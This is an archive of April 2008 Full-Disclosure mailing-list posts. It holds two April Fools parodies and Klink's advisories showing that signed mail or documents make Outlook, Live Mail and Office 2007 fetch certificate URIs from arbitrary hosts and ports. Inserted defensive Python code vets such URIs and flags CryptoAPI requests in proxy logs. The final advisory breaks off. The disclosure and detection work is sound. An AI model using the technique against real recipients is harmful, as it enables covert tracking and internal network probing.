From druid at caughq.org Tue Apr 1 06:00:22 2008
From: druid at caughq.org (I)ruid)
Date: Tue, 01 Apr 2008 00:00:22 -0500
Subject: [Full-disclosure] CAU-2008-0001 - Slowly Closing Door Race Condition
Message-ID: <1207026022.3142.287.camel@localhost>

____ ____ __ __ / \ / \ | | | | ----====####/ /\__\##/ /\ \##| |##| |####====---- | | | |__| | | | | | | | ___ | __ | | | | | ------======######\ \/ /#| |##| |#| |##| |######======------ \____/ |__| |__| \______/

Computer Academic Underground
http://www.caughq.org
Security Advisory

===============/========================================================
Advisory ID: CAU-2008-0001
Release Date: 04/01/2008
Title: Slowly Closing Door Race Condition
Application/OS: Physical Structures
Topic: Physical structures employing exit doors with locks are vulnerable to a race condition.
Vendor Status: Not Notified
Attributes: Physical, Race Condition
Advisory URL: http://www.caughq.org/advisories/CAU-2008-0001.txt
Author/Email: CAU
===============/========================================================

Overview
========

Physical structures which employ automatically locking doors to secure exit points expose a race condition which may allow unauthorized entry.

Impact
======

Malicious outsiders may be able to enter a structure via an exit point.

Exit points may additionally provide an exit from a secure area of the structure, allowing an outsider entering through the exit point to gain direct access to the secure area.

Affected Systems
================

Physical structures which employ automatically locking doors at exit points of the structure.

Technical Explanation
=====================

An exit's lock[1] generally converts a two-way door into a one-way door, allowing a person to traverse the door's threshold in one direction but not in the other. These types of locks are used to secure exit points of structures so that people may exit via the door but not re-enter without disabling the lock through force or authentication.
When a person exits the structure through an exit point which is secured by such a mechanism, a race condition exists wherein a malicious outsider may be able to reach the door and enter through it before it closes and locks itself.

Many doors, especially heavier ones, also employ closing mechanisms[2] which are designed to cause the door to close slowly so as not to slam the door shut and damage the door frame, or damage any human appendage which may be in between the door and its frame. Such closing mechanisms can greatly increase the amount of time that the race condition exists.

Solution & Recommendations
==========================

1) Always ensure that personnel exiting an exit door wait outside the door until it has completely closed and locked before walking away.

2) Employ a double door system such as is used in an air-lock where the interior door must be secured prior to the exterior door being allowed to open.

Exploitation
============

First identify the exit point that you want to exploit. Stand at a safe distance during a high-traffic time and watch for people to use the exit point. Time how long it takes for the door to close and lock itself when someone traverses the exit point.

Next, identify a safe hiding place near the exit point, preferably in a direction that would be behind a person exiting the door, but which is within a distance to the exit point which you could traverse in under the door's closing time at a brisk pace or run.

Finally, hide in this location during a lower traffic time and wait for someone to utilize the exit point. After they have exited the door and are walking away, run to the door and enter before it has closed and locked. Extra points are awarded for a spectacular dive and/or roll to catch the door at the very last second.
References
==========

[1] http://en.wikipedia.org/wiki/Lock_%28device%29
[2] http://en.wikipedia.org/wiki/Door_closer

Credits & Gr33ts
================

Theodor Geisel, AHA!, NMRC, Uninformed Journal, dc214

--
I)ruid, C²ISSP
druid at caughq.org
http://druid.caughq.org

From nate.mcfeters at gmail.com Tue Apr 1 06:18:00 2008
From: nate.mcfeters at gmail.com (Nate McFeters)
Date: Tue, 1 Apr 2008 00:18:00 -0500
Subject: [Full-disclosure] CAU-2008-0001 - Slowly Closing Door Race Condition
In-Reply-To: <1207026022.3142.287.camel@localhost>
References: <1207026022.3142.287.camel@localhost>
Message-ID: <997ef2c20803312218n65a6321cq215f88e872de41ba@mail.gmail.com>

Hahaha, nice find.

On 4/1/08, I)ruid wrote:
>
> ____ ____ __ __ / \ / \ | | | | ----====####/ /\__\##/ /\ \##| |##| |####====---- | | | |__| | | | | | | | ___ | __ | | | | | ------======######\ \/ /#| |##| |#| |##| |######======------ \____/ |__| |__| \______/
>
> Computer Academic Underground
> http://www.caughq.org
> Security Advisory
>
> ===============/========================================================
> Advisory ID: CAU-2008-0001
> Release Date: 04/01/2008
> Title: Slowly Closing Door Race Condition
> Application/OS: Physical Structures
> Topic: Physical structures employing exit doors with locks
> are vulnerable to a race condition.
> Vendor Status: Not Notified
> Attributes: Physical, Race Condition
> Advisory URL: http://www.caughq.org/advisories/CAU-2008-0001.txt
> Author/Email: CAU
> ===============/========================================================
>
> [...]
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
From fdlist at digitaloffense.net Tue Apr 1 06:49:23 2008
From: fdlist at digitaloffense.net (METASPLOIT CORPORATION)
Date: Tue, 1 Apr 2008 00:49:23 -0500
Subject: [Full-disclosure] Metasploit Framework 4.0 / PwnCraft RTS Game
Message-ID: <200804010049.23823.fdlist@digitaloffense.net>

FOR IMMEDIATE RELEASE - APR 1, 200(2<<2)

METASPLOIT CORPORATION ANNOUNCES VERSION 4.0 OF THE METASPLOIT FRAMEWORK WITH EXCITING FEATURES AND A CLOSED SOURCE LICENSE AGREEMENT.

After over a year and a half in stealth-mode, Metasploit Corporation has announced the 4.0 release of their flagship product, The Metasploit Framework. The new release comes jam-packed with exciting features that are sure to please even the German legal system. The following brief list includes some of the more fantastic changes.

PWNCRAFT!

Tired of fighting the good fight with the tried and true user interfaces you've come to expect from exploitation frameworks? Seeing a command shell for the 5000th time got you down? Well, you're in luck. Metasploit has decided to return to its rootz in '08 and focus on the exploitation-as-a-game model. PwnCraft brings the worlds of ownage and pwnage together for the first time in a revolutionary Real Time Strategy (RTS) world. Don't be fooled by the game-like interface, though! The actions you take in PwnCraft have a real effect on the world around you! Here's just a taste of some of the absolutely insane features you can look forward to:

- Glide through enemy networks with a squadron of elegant winged pwnies
- Launch devastating attacks against enemy ports in an all-out IPS-evading TCP/IP assault
- Use the fuzzy Burrowing Badger unit to discover 0day flaws in enemy defenses
- Conquer cities and install agents who can sabotage and smuggle other units to new Vistas
- An entirely in-game interface to the vulnerability sharing market to improve your arsenal on the fly!
- AND MORE!

Beta testing of PwnCraft is currently underway and we are hoping to begin releasing it in stores at a retail price of $49.99 in Q3 2009. More details about the game can be found on the Metasploit website: http://metasploit.com/

CLOSED SOURCE LICENSE

After years of struggling to define Metasploit's licensing position, a final decision has been made to "screw it" and move the framework to a closed source license agreement. The decision was made to sell out for a number of reasons, not the least of which has to do with the benjamins. Metasploit 2.x and 3.x will no longer be available for public download.

SPLOIT AT ME

Get the latest exploits from Metasploit's patent-pending Sploit At Me service that delivers exploits on demand. You can rest assured that Metasploit's Sploit At Me service will attempt to compromise machines of your choosing with *99% reliability.

About Metasploit Corporation

Metasploit Corporation is an industry leader with thousands of non-paying customers world-wide. Metasploit delivers high-quality, top-notch, success-driven exploits to the security world as a one-stop-shop exploitation framework.

* The other 1% of the time, your own machine will be compromised.
From a.klink at cynops.de Tue Apr 1 10:05:53 2008
From: a.klink at cynops.de (Alexander Klink)
Date: Tue, 01 Apr 2008 11:05:53 +0200
Subject: [Full-disclosure] HTTP over X.509 - Microsoft Outlook
Message-ID: <47F1FAF1.8020804@cynops.de>

============================================
||| Security Advisory AKLINK-SA-2008-002 |||
============================================

HTTP over X.509 (S/MIME) - Microsoft Outlook
============================================

Date released: 01.04.2008
Date reported: 11.01.2008
$Revision: 1.1 $

by Alexander Klink
Cynops GmbH
a.klink at cynops.de

https://www.cynops.de/advisories/AKLINK-SA-2008-002.txt
(S/MIME signed: https://www.cynops.de/advisories/AKLINK-SA-2008-002-signed.txt)
https://www.klink.name/security/aklink-sa-2008-002-outlook-smime.txt

Vendor: Microsoft
Product: Outlook
Type of vulnerability: design problem
Class: remote
Status: unpatched
Severity: moderate
Releases known to be affected: Outlook 2007 (12.0.4518.1014)
Releases known NOT to be affected: none

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Background:

S/MIME (Secure / Multipurpose Internet Mail Extensions) is a standard for public key encryption and signing of e-mail based on X.509 certificates. X.509 certificates allow a number of extensions which specify URIs for additional information regarding the certificate - for example a location from which to download the issuer certificate(s). For details see RFC 3851/3850.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Overview:

When receiving an S/MIME-signed email, Outlook attempts to use the additional URIs contained in the certificate to download information relevant for the verification of the certificate. It will automatically send out HTTP requests to any location that is reachable from the client - which might include networks previously unreachable to an attacker.
Results are unnoticed access to both external and internal webservers, which in turn could be attacked using other vectors and - in the simplest case - a "reading confirmation", which is often undesired by the recipient as well (for example if the sender is a spammer). For an overview of this class of attacks, see the "HTTP over X.509" whitepaper at https://www.cynops.de/techzone/http_over_x509.html.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Technical details:

For an introduction to the technical details, please see the whitepaper. In this particular case, Microsoft Crypto API handles the authorityInfoAccess caIssuers extension. The HTTP requests are sent out as soon as the e-mail is opened in the preview pane.

The Microsoft Crypto API accepts up to five CA Issuer URIs in the given certificate which may be up to 8 kibibit each (so there is enough space for a potential attack payload). Contrary to the RFC, it only accepts HTTP URIs.

The Crypto API connects to arbitrary TCP ports (both privileged and unprivileged) specified in the HTTP URI. In one test, the attempt to connect to a running machine (more or less regardless of whether the particular requested port is open or not) took about 3 seconds and attempting to connect to an unreachable machine took about 10-16 seconds. If this could be confirmed to be always the case (some preliminary tests indicated otherwise), this would allow one to scan for internal hosts via mail (at the great speed of two hosts per opened mail - it is not as fast as PortBunny, granted).

At yet undetermined intervals, it also seems to occasionally try to get the CA issuer certificates again, leading to more HTTP requests.

Also to be noted is that the certificate validation takes place even if the S/MIME signature itself is invalid - this means that a clever spammer would not even have to burn CPU cycles on creating correct signatures.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Proof of Concept:

To receive such an S/MIME-signed email that triggers an HTTP request and to verify that this request reaches an outside server, send a blank email to smime-http at klink.name.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Communication:

11.01.2008, 17:20 UTC: Contacted secure at microsoft.com with information, advisory draft (in an S/MIME-encrypted mail) and an example mail.
11.01.2008, 18:30 and 18:49 UTC: The example mail triggers HTTP requests from 131.107.0.[104|75] with a user agent of "Microsoft-CryptoAPI/5.131.3790.3959".
11.01.2008, 21:54 UTC: Nate from Microsoft replies with case number (7897) and case manager (Geoff). The original mail is fullquoted in this unencrypted reply - why did I bother to install their certificate again?
14.01.2008, 17:33 UTC: The example mail triggers more HTTP requests from 131.107.0.103, this time with a user agent of "Microsoft-CryptoAPI/5.131.2600.2180".
31.01.2008/01.02.2008: The example mail regularly triggers HTTP requests from 207.46.55.29, with user agents of "Microsoft-CryptoAPI/5.131.2600.2180", "Microsoft-CryptoAPI/5.131.2600.3285", "Microsoft-CryptoAPI/5.131.2600.3297", "Microsoft-CryptoAPI/5.131.3790.1830", "Microsoft-CryptoAPI/5.131.3790.3959" and "Microsoft-CryptoAPI/6.0".
01.02.2008, 00:14 UTC: Geoff replies to let me know they are working on it (yes, I can see that :-). Dave and a few additional teams are assisting with the investigation of the issue, no requests for additional information, they will stay in contact within the next few weeks to provide me with an update. The original report is again sent along unencrypted and fullquoted.
February/March 2008: The occasional Microsoft HTTP request appears in the webserver logfiles.
18.03.2008: Requested update on the issue, informed them that Office 2007 is vulnerable to the same problem as well (as are signed executables, but the signature is not checked automatically) and IPSec does not seem to be vulnerable.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Solution:

None so far.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Workarounds:

- limit Outlook's ability to do HTTP requests, for example by setting an invalid proxy in the internet options. If possible, filter outgoing HTTP requests with a user-agent matching "Microsoft-CryptoAPI/*"

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Why this advisory has no CVE ID:

Normally, I make sure every advisory I release has a CVE ID to ensure that the issue can be identified without doubt. In the past, I have been assigned CVE IDs directly and promptly by Steve Christey of MITRE. The communication in this case went like this:

17.01.2008: contacted Steve Christey with the question on how to handle CVEs for a generic issue in an RFC that is vulnerable in a specific implementation.
01.02.2008: contacted Steve again to ask for an update
01.02.2008: Steve replies saying that he must have missed the first email and says:
| This can be a tough one for CVE, but if it's a fundamental design problem
| in a single RFC, and *any* conformant implementation will have the issue,
| then it gets a single CVE.
02.02.2008: Updated Steve with details on the vulnerability
07.02.2008: Contacted Steve again for an update
26.02.2008: Contacted Steve again with the explicit wish for CVE IDs for the issues in Outlook, Windows Live Mail and Office 2007
28.02.2008: Contacted Steve again asking for the assignment of the CVE IDs
28.02.2008: Contacted cve at mitre.org as well in case Steve is no longer the correct contact

From what I read on the CVE website, it looks like Microsoft assigns the CVE IDs for their own issues themselves, but they don't talk to me very much either. I like the CVE idea and would like to use CVE IDs whenever possible, but someone would have to answer my mails for that.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Credits:

- Alexander Klink, Cynops GmbH (discovery)

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Thanks to:

- Philipp Südmeyer for the help in trying out the first attacks

--
Dipl.-Math. Alexander Klink | IT-Security Engineer | a.klink at cynops.de
mobile: +49 (0)178 2121703 | Cynops GmbH | http://www.cynops.de
----------------------------+----------------------+---------------------
HRB 7833, Amtsgericht | USt-Id: DE 213094986 | Geschäftsführer:
Bad Homburg v. d. Höhe | | Martin Bartosch
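The advisory above describes CryptoAPI following authorityInfoAccess caIssuers URIs to whatever host and TCP port the signer's certificate names. As an added example (not Klink's code and not Microsoft's CryptoAPI logic), the following Python vets a certificate's caIssuers list the way a hardened verifier or an egress proxy could before permitting the fetch: it refuses non-HTTP schemes, non-standard ports, IP literals (especially non-global ones, where an internal server would sit), single-label intranet names and hosts outside a CA allowlist, and treats more than five URIs as suspicious. The limits "five URIs" and "HTTP only" are taken from the advisory; the remaining policy, the host names, the addresses and the allowlist are constructed for this example.

```python
import ipaddress
from urllib.parse import urlsplit

# Policy limits for this example. The counts mirror what the advisory reports
# about CryptoAPI (at most five caIssuers URIs, HTTP only); the policy itself
# is this example's own, not CryptoAPI's behaviour.
MAX_CA_ISSUER_URIS = 5
ALLOWED_SCHEMES = {"http"}
ALLOWED_PORTS = {80}


def vet_ca_issuer_uri(uri, allowed_hosts=None):
    """Return (ok, reason) for a single authorityInfoAccess caIssuers URI.

    The checks target the failure modes the advisory describes: arbitrary
    TCP ports, hosts inside the client's own network, and address literals.
    """
    try:
        parts = urlsplit(uri)
        port = parts.port  # raises ValueError on a non-numeric/out-of-range port
    except ValueError as exc:
        return False, f"unparseable URI: {exc}"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not permitted"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if port is None:
        port = 80  # default for http
    if port not in ALLOWED_PORTS:
        return False, f"non-standard port {port}"
    # Address literals: a CA publishes its certificates under a DNS name, and
    # anything non-global (RFC 1918, loopback, link-local, ...) is internal.
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        addr = None
    if addr is not None:
        if not addr.is_global:
            return False, f"non-global address literal {host}"
        return False, "IP literal instead of a CA host name"
    if "." not in host:
        return False, f"single-label (intranet) host name {host!r}"
    if allowed_hosts is not None and host.lower() not in allowed_hosts:
        return False, f"host {host!r} not in CA allowlist"
    return True, "ok"


def vet_ca_issuer_uris(uris, allowed_hosts=None):
    """Vet a certificate's whole caIssuers list. Returns (fetch_allowed, details).

    Fetching is permitted only if every URI passes: one bad URI makes the whole
    list suspicious, and more entries than MAX_CA_ISSUER_URIS is itself a flag.
    """
    details = [(u, *vet_ca_issuer_uri(u, allowed_hosts)) for u in uris]
    too_many = len(uris) > MAX_CA_ISSUER_URIS
    fetch_allowed = not too_many and all(ok for _, ok, _ in details)
    return fetch_allowed, details


# Constructed sample: the kind of caIssuers list the advisory describes.
# All hosts and addresses here are made up for the example.
SAMPLE_URIS = [
    "http://pki.example-ca.test/issuer.crt",           # looks legitimate
    "http://10.0.0.17:8080/",                           # internal host, odd port
    "http://intranet/",                                 # single-label name
    "http://[fe80::1]/",                                # link-local IPv6 literal
    "ldap://ldap.example-ca.test/cn=CA?cACertificate",  # RFC-allowed, not HTTP
]
ALLOWED_CA_HOSTS = {"pki.example-ca.test"}

if __name__ == "__main__":
    allowed, details = vet_ca_issuer_uris(SAMPLE_URIS, ALLOWED_CA_HOSTS)
    for uri, ok, reason in details:
        print(f"{('ALLOW' if ok else 'BLOCK'):5} {uri}  ({reason})")
    print("fetch allowed for this certificate:", allowed)
```

Run stand-alone, the sample allows only the first URI and blocks the other four, so the certificate as a whole is rejected. The same function can sit in front of any AIA-fetching verifier, or be applied by a proxy to the absolute request URI, which is where the advisory's "filter outgoing HTTP requests" workaround is enforced.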
From a.klink at cynops.de Tue Apr 1 10:06:03 2008
From: a.klink at cynops.de (Alexander Klink)
Date: Tue, 01 Apr 2008 11:06:03 +0200
Subject: [Full-disclosure] HTTP over X.509 - Windows Live Mail
Message-ID: <47F1FAFB.106@cynops.de>

============================================
||| Security Advisory AKLINK-SA-2008-003 |||
============================================

HTTP over X.509 (S/MIME) - Windows Live Mail
============================================

Date released: 01.04.2008
Date reported: 11.01.2008
$Revision: 1.1 $

by Alexander Klink
Cynops GmbH
a.klink at cynops.de

https://www.cynops.de/advisories/AKLINK-SA-2008-003.txt
(S/MIME signed: https://www.cynops.de/advisories/AKLINK-SA-2008-003-signed.txt)
https://www.klink.name/security/aklink-sa-2008-003-live-mail-smime.txt

Vendor: Microsoft
Product: Windows Live Mail
Type of vulnerability: design problem
Class: remote
Status: unpatched
Severity: moderate
Releases known to be affected: 2008 (Build 12.0.1606)
Releases known NOT to be affected: none

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Background:

S/MIME (Secure / Multipurpose Internet Mail Extensions) is a standard for public key encryption and signing of e-mail based on X.509 certificates. X.509 certificates allow a number of extensions which specify URIs for additional information regarding the certificate - for example a location from which to download the issuer certificate(s). For details see RFC 3851/3850.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Overview:

When receiving an S/MIME-signed email, Windows Live Mail attempts to use the additional URIs contained in the certificate to download information relevant for the verification of the certificate.
It will automatically send out HTTP requests to any location that is reachable from the client - which might include networks previously unreachable to an attacker.

Results are unnoticed access to both external and internal webservers, which in turn could be attacked using other vectors and - in the simplest case - a "reading confirmation", which is often undesired by the recipient as well (for example if the sender is a spammer). For an overview of this class of attacks, see the "HTTP over X.509" whitepaper at https://www.cynops.de/techzone/http_over_x509.html.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Technical details:

For an introduction to the technical details, please see the whitepaper. In this particular case, Microsoft Crypto API handles the authorityInfoAccess caIssuers extension. The HTTP requests are sent out as soon as the e-mail is opened in the preview pane.

The Microsoft Crypto API accepts up to five CA Issuer URIs in the given certificate which may be up to 8 kibibit each (so there is enough space for a potential attack payload). Contrary to the RFC, it only accepts HTTP URIs.

The Crypto API connects to arbitrary TCP ports (both privileged and unprivileged) specified in the HTTP URI. In one test, the attempt to connect to a running machine (more or less regardless of whether the particular requested port is open or not) took about 3 seconds and attempting to connect to an unreachable machine took about 10-16 seconds. If this could be confirmed to be always the case (some preliminary tests indicated otherwise), this would allow one to scan for internal hosts via mail (at the great speed of two hosts per opened mail - it is not as fast as PortBunny, granted).

At yet undetermined intervals, it also seems to occasionally try to get the CA issuer certificates again, leading to more HTTP requests.
Also to be noted is that the certificate validation takes place even if the S/MIME signature itself is invalid - this means that a clever spammer would not even have to burn CPU cycles on creating correct signatures.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Proof of Concept:

To receive such an S/MIME-signed email that triggers an HTTP request and to verify that this request reaches an outside server, send a blank email to smime-http at klink.name.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Communication:

11.01.2008, 17:20 UTC: Contacted secure at microsoft.com with information, advisory draft (in an S/MIME-encrypted mail) and an example mail.
11.01.2008, 18:30 and 18:49 UTC: The example mail triggers HTTP requests from 131.107.0.[104|75] with a user agent of "Microsoft-CryptoAPI/5.131.3790.3959".
11.01.2008, 21:54 UTC: Nate from Microsoft replies with case number (7897) and case manager (Geoff). The original mail is fullquoted in this unencrypted reply - why did I bother to install their certificate again?
14.01.2008, 17:33 UTC: The example mail triggers more HTTP requests from 131.107.0.103, this time with a user agent of "Microsoft-CryptoAPI/5.131.2600.2180".
31.01.2008/01.02.2008: The example mail regularly triggers HTTP requests from 207.46.55.29, with user agents of "Microsoft-CryptoAPI/5.131.2600.2180", "Microsoft-CryptoAPI/5.131.2600.3285", "Microsoft-CryptoAPI/5.131.2600.3297", "Microsoft-CryptoAPI/5.131.3790.1830", "Microsoft-CryptoAPI/5.131.3790.3959" and "Microsoft-CryptoAPI/6.0".
01.02.2008, 00:14 UTC: Geoff replies to let me know they are working on it (yes, I can see that :-). Dave and a few additional teams are assisting with the investigation of the issue, no requests for additional information, they will stay in contact within the next few weeks to provide me with an update. The original report is again sent along unencrypted and fullquoted.
February/March 2008: The occasional Microsoft HTTP request appears in the webserver logfiles.
18.03.2008: Requested update on the issue, informed them that Office 2007 is vulnerable to the same problem as well (as are signed executables, but the signature is not checked automatically) and IPSec does not seem to be vulnerable.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Solution:

None so far.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Workarounds:

- limit Live Mail's ability to do HTTP requests, for example by setting an invalid proxy in the internet options. If possible, filter outgoing HTTP requests with a user-agent matching "Microsoft-CryptoAPI/*"

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Why this advisory has no CVE ID:

Normally, I make sure every advisory I release has a CVE ID to ensure that the issue can be identified without doubt. In the past, I have been assigned CVE IDs directly and promptly by Steve Christey of MITRE. The communication in this case went like this:

17.01.2008: contacted Steve Christey with the question on how to handle CVEs for a generic issue in an RFC that is vulnerable in a specific implementation.
01.02.2008: contacted Steve again to ask for an update
01.02.2008: Steve replies saying that he must have missed the first email and says:
| This can be a tough one for CVE, but if it's a fundamental design problem
| in a single RFC, and *any* conformant implementation will have the issue,
| then it gets a single CVE.
02.02.2008: Updated Steve with details on the vulnerability
07.02.2008: Contacted Steve again for an update
26.02.2008: Contacted Steve again with the explicit wish for CVE IDs for the issues in Outlook, Windows Live Mail and Office 2007
28.02.2008: Contacted Steve again asking for the assignment of the CVE IDs
28.02.2008: Contacted cve at mitre.org as well in case Steve is no longer the correct contact

From what I read on the CVE website, it looks like Microsoft assigns the CVE IDs for their own issues themselves, but they don't talk to me very much either. I like the CVE idea and would like to use CVE IDs whenever possible, but someone would have to answer my mails for that.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Credits:

- Alexander Klink, Cynops GmbH (discovery)

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Thanks to:

- Philipp Südmeyer for the help in trying out the first attacks using Outlook

--
Dipl.-Math. Alexander Klink | IT-Security Engineer | a.klink at cynops.de
mobile: +49 (0)178 2121703 | Cynops GmbH | http://www.cynops.de
----------------------------+----------------------+---------------------
HRB 7833, Amtsgericht | USt-Id: DE 213094986 | Geschäftsführer:
Bad Homburg v. d. Höhe | | Martin Bartosch
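Both the Outlook and the Windows Live Mail advisory end with the same workaround: filter outgoing HTTP requests whose user-agent matches "Microsoft-CryptoAPI/*". As an added example that is not part of either advisory, here is a small Python detector over forward-proxy log lines. It isolates CryptoAPI fetches and raises alerts for three things the advisories describe: a fetch to a non-standard port, a fetch to a non-global (internal) address literal, and one client contacting several distinct targets, the pattern that "scanning for internal hosts via mail" would leave behind. The log format (combined format with an absolute request URI, as a proxy records it), the client addresses and the destination hosts are constructed for the example; the user-agent strings are those reported in the advisory's Communication section.

```python
import ipaddress
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed forward-proxy log lines (combined format, absolute request URI).
# Sample data for this example only; addresses and hosts are made up, the
# user-agent strings are the ones the advisory reports.
SAMPLE_LOG = """\
10.1.2.30 - - [01/Apr/2008:11:05:53 +0200] "GET http://pki.example-ca.test/issuer.crt HTTP/1.1" 200 1203 "-" "Microsoft-CryptoAPI/5.131.2600.2180"
10.1.2.30 - - [01/Apr/2008:11:05:54 +0200] "GET http://10.1.2.40:8080/ HTTP/1.1" 503 0 "-" "Microsoft-CryptoAPI/5.131.2600.2180"
10.1.2.30 - - [01/Apr/2008:11:05:57 +0200] "GET http://10.1.2.41:22/ HTTP/1.1" 503 0 "-" "Microsoft-CryptoAPI/5.131.2600.2180"
10.1.2.31 - - [01/Apr/2008:11:06:03 +0200] "GET http://www.example.test/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1) Firefox/2.0"
10.1.2.31 - - [01/Apr/2008:11:06:10 +0200] "GET http://crl.example-ca.test/ca.crl HTTP/1.1" 200 800 "-" "Microsoft-CryptoAPI/6.0"
"""

LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# The advisory's workaround pattern, anchored at the start of the user-agent.
CRYPTOAPI_UA = re.compile(r'^Microsoft-CryptoAPI/')


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def is_internal_target(host):
    """True for address literals that are not globally routable (RFC 1918 etc.)."""
    try:
        return not ipaddress.ip_address(host).is_global
    except ValueError:
        return False  # a host name, not an address literal


def analyse(log_text, scan_threshold=2):
    """Return (cryptoapi_requests, alerts) for the given proxy log text.

    scan_threshold: more than this many distinct (host, port) targets from one
    client is reported as a possible scan driven by signed mail.
    """
    hits, alerts = [], []
    targets_by_client = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not CRYPTOAPI_UA.match(rec["ua"]):
            continue
        parts = urlsplit(rec["url"])
        host = parts.hostname or ""
        try:
            port = parts.port or 80
        except ValueError:
            port = -1  # malformed port in the URI; still worth an alert below
        hits.append(rec)
        targets_by_client[rec["client"]].add((host, port))
        if port != 80:
            alerts.append(f"{rec['client']}: CryptoAPI fetch to non-standard port {host}:{port}")
        if is_internal_target(host):
            alerts.append(f"{rec['client']}: CryptoAPI fetch to internal address {host}")
    for client, targets in targets_by_client.items():
        if len(targets) > scan_threshold:
            alerts.append(f"{client}: {len(targets)} distinct CryptoAPI targets "
                          f"(possible scan via signed mail)")
    return hits, alerts


if __name__ == "__main__":
    hits, alerts = analyse(SAMPLE_LOG)
    print(f"{len(hits)} CryptoAPI requests in {len(SAMPLE_LOG.splitlines())} lines")
    for a in alerts:
        print("ALERT", a)
```

On the sample, the four CryptoAPI requests yield five alerts, all for client 10.1.2.30: two odd-port fetches, two fetches to internal addresses, and the distinct-target count. A plain certificate-chain fetch from 10.1.2.31 to a CA host on port 80 produces none, which is the behaviour a filter built on the user-agent alone would have to allow anyway.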
From a.klink at cynops.de Tue Apr 1 10:06:13 2008
From: a.klink at cynops.de (Alexander Klink)
Date: Tue, 01 Apr 2008 11:06:13 +0200
Subject: [Full-disclosure] HTTP over X.509 - Office 2007
Message-ID: <47F1FB05.2030107@cynops.de>

============================================
||| Security Advisory AKLINK-SA-2008-004 |||
============================================

HTTP over X.509 - Microsoft Office 2007
=======================================

Date released: 01.04.2008
Date reported: 18.03.2008 (a similar issue was reported on 11.01.2008)
$Revision: 1.1 $

by Alexander Klink
Cynops GmbH
a.klink at cynops.de

https://www.cynops.de/advisories/AKLINK-SA-2008-004.txt
(S/MIME signed: https://www.cynops.de/advisories/AKLINK-SA-2008-004-signed.txt)
https://www.klink.name/security/aklink-sa-2008-004-office2007-signatures.txt

Vendor: Microsoft
Product: Office 2007
Type of vulnerability: design problem
Class: remote
Status: unpatched
Severity: moderate
Releases known to be affected: 12.0.6212.1000 SP1 MSO (12.0.6213.1000)
Releases known NOT to be affected: none

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Background:

Microsoft Office 2007 allows a user to sign documents using X.509 certificates. X.509 certificates allow a number of extensions which specify URIs for additional information regarding the certificate - for example a location from which to download the issuer certificate(s).

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Overview:

When opening a document with a digital signature, Office 2007 attempts to use the additional URIs contained in the certificate to download information relevant for the verification of the certificate.
It will automatically send out HTTP requests to any location that is reachable from the client - which might include networks previously unreachable to an attacker.

Results are unnoticed access to both external and internal webservers, which in turn could be attacked using other vectors and - in the simplest case - an "opening confirmation", which is often undesired by the recipient as well (as it can be used to track who opened which document at what time). For an overview of this class of attacks, see the "HTTP over X.509" whitepaper at https://www.cynops.de/techzone/http_over_x509.html.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Technical details:

For an introduction to the technical details, please see the whitepaper. In this particular case, Microsoft Crypto API handles the authorityInfoAccess caIssuers extension. The HTTP requests are sent out as soon as the document is opened.

The Microsoft Crypto API accepts up to five CA Issuer URIs in the given certificate which may be up to 8 kibibit each (so there is enough space for a potential attack payload). Contrary to the RFC, it only accepts HTTP URIs.

The Crypto API connects to arbitrary TCP ports (both privileged and unprivileged) specified in the HTTP URI. In one test, the attempt to connect to a running machine (more or less regardless of whether the particular requested port is open or not) took about 3 seconds and attempting to connect to an unreachable machine took about 10-16 seconds. If this could be confirmed to be always the case (some preliminary tests indicated otherwise), this would allow one to scan for internal hosts via mail (at the great speed of two hosts per opened mail - it is not as fast as PortBunny, granted).

Contrary to the vulnerabilities in Microsoft Outlook and Windows Live Mail, the certificate is only verified if the signature is intact.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Proof of Concept:

A signed Word 2007 document that triggers an HTTP request is available at http://www.klink.name/security/HTTP_over_Office_2007_PoC.docx

The document contains a link which shows the last 10 HTTP requests triggered by this document. By checking whether you are on the list, you can verify if you are affected by this vulnerability.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Communication:

